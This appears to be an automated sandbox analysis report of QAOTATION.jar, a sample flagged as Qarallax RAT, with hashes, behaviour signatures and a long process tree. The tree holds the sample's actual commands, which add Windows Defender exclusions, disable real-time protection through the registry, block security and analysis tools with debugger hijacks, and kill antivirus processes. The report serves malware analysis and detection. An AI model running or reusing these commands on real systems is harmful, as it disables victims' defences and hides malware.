Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    19-08-2020 13:26

General

  • Target

    QAOTATION.jar

  • Size

    399KB

  • MD5

    be666fddf4e70621ec1a8fe19348bbc3

  • SHA1

    132069951f67e7bd94cfce57a137b9f82ead15ad

  • SHA256

    3b7e009a2ca84ce2834f422390a85515b80034e4227c05e7522b274e862c7924

  • SHA512

    0ef5796a8bb0913389fefc4c940bd0200189d1227071e6a5a400c55925ee396722fa6107f91f618c9799e339a231ab43a7189378388f0551e2064d2eb9ff62fb

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • QarallaxRAT

    Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).

  • Qarallax RAT support DLL 1 IoCs
  • Sets file execution options in registry 2 TTPs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Kills process with taskkill 16 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 122 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 382 IoCs
  • Views/modifies file attributes 1 TTPs 8 IoCs

Processes

  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\QAOTATION.jar
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:788
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe
      2⤵
        PID:1820
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:668
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4024
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3596
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3160
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h C:\Users\Admin\Oracle
        2⤵
        • Views/modifies file attributes
        PID:3700
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h +r +s C:\Users\Admin\.ntusernt.ini
        2⤵
        • Views/modifies file attributes
        PID:2396
      • C:\Windows\SYSTEM32\attrib.exe
        attrib -s -r C:\Users\Admin\oWsdf\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2788
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +s +r C:\Users\Admin\oWsdf\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2884
      • C:\Windows\SYSTEM32\attrib.exe
        attrib -s -r C:\Users\Admin\oWsdf
        2⤵
        • Views/modifies file attributes
        PID:3124
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +s +r C:\Users\Admin\oWsdf
        2⤵
        • Views/modifies file attributes
        PID:3784
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h C:\Users\Admin\oWsdf
        2⤵
        • Views/modifies file attributes
        PID:496
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h +s +r C:\Users\Admin\oWsdf\MIJPw.class
        2⤵
        • Views/modifies file attributes
        PID:572
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1472
        • C:\Windows\system32\reg.exe
          reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
          3⤵
            PID:1244
          • C:\Windows\system32\reg.exe
            reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
            3⤵
              PID:1004
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
            2⤵
            • Kills process with taskkill
            PID:3992
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\oWsdf','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\oWsdf\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3904
          • C:\Windows\System32\reg.exe
            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
            2⤵
              PID:3516
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              2⤵
                PID:3864
              • C:\Windows\System32\reg.exe
                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                2⤵
                  PID:2468
                • C:\Windows\System32\reg.exe
                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                  2⤵
                    PID:752
                  • C:\Windows\System32\reg.exe
                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                    2⤵
                      PID:948
                    • C:\Windows\System32\reg.exe
                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                      2⤵
                        PID:3820
                      • C:\Windows\System32\reg.exe
                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                        2⤵
                          PID:2408
                        • C:\Windows\System32\reg.exe
                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                          2⤵
                            PID:2348
                          • C:\Windows\System32\reg.exe
                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                            2⤵
                              PID:3228
                            • C:\Windows\System32\reg.exe
                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                              2⤵
                                PID:4056
                              • C:\Windows\System32\reg.exe
                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                2⤵
                                  PID:3844
                                • C:\Windows\System32\reg.exe
                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                  2⤵
                                    PID:1236
                                  • C:\Windows\System32\reg.exe
                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                    2⤵
                                      PID:720
                                    • C:\Windows\System32\reg.exe
                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                      2⤵
                                        PID:3800
                                      • C:\Windows\System32\taskkill.exe
                                        "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
                                        2⤵
                                        • Kills process with taskkill
                                        PID:2936
                                      • C:\Windows\System32\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                        2⤵
                                          PID:4000
                                        • C:\Windows\System32\reg.exe
                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                          2⤵
                                            PID:4032
                                          • C:\Windows\System32\reg.exe
                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                            2⤵
                                              PID:2976
                                            • C:\Windows\System32\reg.exe
                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                              2⤵
                                                PID:1816
                                              • C:\Windows\System32\reg.exe
                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                2⤵
                                                  PID:1404
                                                • C:\Windows\System32\reg.exe
                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                  2⤵
                                                    PID:3784
                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                    cmd.exe
                                                    2⤵
                                                      PID:4024
                                                      • C:\Windows\system32\reg.exe
                                                        reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
                                                        3⤵
                                                          PID:3032
                                                        • C:\Windows\system32\reg.exe
                                                          reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
                                                          3⤵
                                                            PID:1808
                                                        • C:\Windows\System32\taskkill.exe
                                                          "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
                                                          2⤵
                                                          • Kills process with taskkill
                                                          PID:3088
                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                          cmd.exe
                                                          2⤵
                                                            PID:2124
                                                            • C:\Windows\system32\reg.exe
                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
                                                              3⤵
                                                                PID:3196
                                                              • C:\Windows\system32\reg.exe
                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
                                                                3⤵
                                                                  PID:3392
                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                cmd.exe
                                                                2⤵
                                                                  PID:2144
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
                                                                    3⤵
                                                                      PID:3440
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
                                                                      3⤵
                                                                        PID:1004
                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                      cmd.exe
                                                                      2⤵
                                                                        PID:3704
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
                                                                          3⤵
                                                                            PID:2252
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
                                                                            3⤵
                                                                              PID:2484
                                                                          • C:\Windows\System32\taskkill.exe
                                                                            "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
                                                                            2⤵
                                                                            • Kills process with taskkill
                                                                            PID:2772
                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                            cmd.exe
                                                                            2⤵
                                                                              PID:2788
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
                                                                                3⤵
                                                                                  PID:2304
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
                                                                                  3⤵
                                                                                    PID:1752
                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                  cmd.exe
                                                                                  2⤵
                                                                                    PID:484
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
                                                                                      3⤵
                                                                                        PID:2372
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
                                                                                        3⤵
                                                                                          PID:4028
                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                        cmd.exe
                                                                                        2⤵
                                                                                          PID:2656
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
                                                                                            3⤵
                                                                                              PID:668
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
                                                                                              3⤵
                                                                                                PID:2424
                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                              cmd.exe
                                                                                              2⤵
                                                                                                PID:3876
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
                                                                                                  3⤵
                                                                                                    PID:3740
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
                                                                                                    3⤵
                                                                                                      PID:3196
                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                    cmd.exe
                                                                                                    2⤵
                                                                                                      PID:3392
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
                                                                                                        3⤵
                                                                                                          PID:3708
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
                                                                                                          3⤵
                                                                                                            PID:2036
                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                          cmd.exe
                                                                                                          2⤵
                                                                                                            PID:948
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
                                                                                                              3⤵
                                                                                                                PID:1816
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
                                                                                                                3⤵
                                                                                                                  PID:2764
                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
                                                                                                                2⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:3896
                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                cmd.exe
                                                                                                                2⤵
                                                                                                                  PID:1752
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:3992
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:1808
                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                      cmd.exe
                                                                                                                      2⤵
                                                                                                                        PID:3216
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:3740
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:1708
                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                            cmd.exe
                                                                                                                            2⤵
                                                                                                                              PID:572
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:3700
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:3096
                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                  cmd.exe
                                                                                                                                  2⤵
                                                                                                                                    PID:4056
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:3900
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:2144
                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                        cmd.exe
                                                                                                                                        2⤵
                                                                                                                                          PID:3028
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:2392
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:1716
                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                              cmd.exe
                                                                                                                                              2⤵
                                                                                                                                                PID:3748
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3052
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:620
                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                    cmd.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1400
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2296
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3992
                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                          cmd.exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3100
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3300
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3988
                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
                                                                                                                                                                2⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:3740
                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                cmd.exe
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:724
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:732
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2764
                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                      cmd.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:620
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:3992
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:3064
                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                            cmd.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2124
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:1404
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3720
                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4032
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:488
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1776
                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:3196
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1480
                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:3516
                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:3964
                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4000
                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:496
                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:2392
                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:3836
                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4004
                                                                                                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:3784
                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:3788
                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3848
                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:2976
                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:2300
                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:3048
                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:3516
                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:496
